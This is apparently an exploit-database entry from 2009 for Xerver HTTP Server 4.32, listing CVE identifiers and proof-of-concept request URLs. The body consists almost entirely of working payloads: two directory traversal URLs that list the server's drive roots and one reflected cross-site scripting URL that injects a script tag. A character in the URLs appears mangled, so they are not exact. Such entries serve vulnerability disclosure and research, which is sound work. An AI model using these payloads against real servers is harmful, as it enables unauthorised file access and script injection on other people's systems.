Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal
Author: Stack
type: remote
platform: multiple
port:
date_added: 2009-09-17
date_updated:
verified: 1
codes: OSVDB-58645;CVE-2009-3562;OSVDB-58644;CVE-2009-3561
tags:
aliases:
screenshot_url:
application_url:
Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability
By Stack
Directory Traversal Exploit :
http://127.0.0.1:32123/action=chooseDirectory¤tPath=d:%5C
http://127.0.0.1:32123/action=chooseDirectory¤tPath=c:\
XSS Exploit :
http://127.0.0.1:32123/action=chooseDirectory¤tPath='">><script>alert('XSS By Stack')</script>
# milw0rm.com [2009-09-18]